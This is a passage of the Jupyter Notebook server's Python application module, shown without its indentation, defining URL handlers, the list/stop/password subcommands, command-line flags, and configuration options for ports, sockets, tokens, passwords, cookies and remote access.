jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch another
# list of servers and ensure our server is not in the list before
# sending the wrong impression.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help=_('Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
        For versions of notebook > 5.7.2, a security measure was added that
        prevented the authentication token used to launch the browser from being visible.
        This feature makes it difficult for other users on a multi-user system to
        run code in your Jupyter session as you.
        However, in some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
        launching a browser using a redirect file can lead to the browser failing to load.
        This is because of the difference in file structures/paths between the runtime and
        the browser.
        Setting this to False will disable this behavior, allowing the browser
        to launch by using a URL and visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
While logging in with a token, the notebook server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
(shutdown the notebook server)."""
)
# We relax this trait to handle Contents Managers using jupyter_server
# as the core backend.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
ContentsManager,
# To make custom ContentsManagers both forward+backward
# compatible, we'll relax the strictness of this trait
# and allow jupyter_server contents managers to pass
# through. If jupyter_server is not installed, this class
# will be ignored.
'jupyter_server.contents.services.managers.ContentsManager'
],
config=True,
help=_('The notebook manager class to use.')
)
# Throws a deprecation warning to jupyter_server based contents managers.
@observe('contents_manager_class')
def _observe_contents_manager_class(self, change):
new = change['new']
# If 'new' is a class, get a string representing the import
# module path.
if inspect.isclass(new):
new = new.__module__
if new.startswith('jupyter_server'):
self.log.warning(
"The specified 'contents_manager_class' class inherits a manager from the "
"'jupyter_server' package. These (future-looking) managers are not "
"guaranteed to work with the 'notebook' package. For longer term support "
"consider switching to NBClassic—a notebook frontend that leverages "
"Jupyter Server as its server backend."
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
        The API of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers "
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
